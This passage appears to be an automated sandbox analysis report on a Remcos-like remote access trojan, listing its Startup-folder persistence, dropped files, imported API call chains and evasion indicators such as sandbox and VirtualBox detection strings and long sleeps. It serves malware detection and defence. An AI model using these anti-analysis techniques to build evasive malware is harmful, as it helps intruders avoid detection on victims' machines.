                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00401102 in eax, dx | 11_2_00401102
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 31458
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 30860
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | Binary or memory string: TSBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, | 11_2_004106B8
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 519
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 910
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 7754
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: foregroundWindowGot 1760
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Evaded block: after key decision | graph_11-5127
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | API coverage: 2.1 %
                    Source: C:\Users\user\Desktop\file.exe TID: 1476 | Thread sleep time: -5190000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 6416 | Thread sleep time: -455000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 6416 | Thread sleep time: -3877000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 004044E8h | 11_2_004044C3
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 004044E8h | 11_2_004044C3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, | 5_2_004051E3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, | 5_2_004041A6
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, | 5_2_00404E73
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, | 5_2_00408AE5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, | 5_2_00409832
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, | 5_2_00408961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, | 11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_tr
aits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator
@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$a
llocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
